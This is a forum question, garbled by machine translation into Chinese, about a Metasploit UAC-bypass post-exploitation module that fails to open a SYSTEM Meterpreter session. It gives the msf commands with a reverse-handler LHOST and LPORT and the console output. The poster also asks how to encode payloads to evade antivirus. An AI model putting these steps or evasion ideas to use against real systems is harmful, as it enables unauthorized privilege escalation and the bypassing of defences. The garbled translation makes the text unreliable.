后/窗/升级/ bypassuac似乎失败对我来说的Metasploit:bypassuac窗口权限提升挂起
出于某种原因,我不能得到这个职位,开发模块bypassuac工作。 这是我做过什么:
- 打开目标机器上的Meterpreter就会会话(如在NetworkService用户)
- 把会议背景
尝试使用后开发模块是这样的:
后期使用/窗/升级/ bypassuac 设置会话1个 集LHOST 192.168.1.100 集LPORT 4444利用
该端口尚未使用,所以应该没问题。
输出如下:
[ - ]处理程序不能结合到192.168.1.100:4444 []开始反向处理程序上0.0.0.0:4444 []启动有效负载处理程序。 .. []上载旁路UAC可执行到文件系统... [] Meterpreter就会驿站可执行73802个字节长正在上传.. []上载的代理到文件系统.... []邮模块执行完成
然后它返回到控制台,什么也不做,没有新的会话,什么也不做。
我查了以下几件事:
- 手动上传可执行bypassuac-x86.exe程序的目标。这工作得很好。
- 检查virusscanner的警铃是否未响应可执行文件。他们没有
有没有办法手动运行可执行文件,并且有人可以向我解释如何以SYSTEM级别访问方式打开新的meterpreter会话?
或者我可以以某种方式编码有效负载并使用我的自定义模板来规避所有防病毒可能性?我还没有找到任何编码后期开发模块的选项。
在此先感谢
Halvar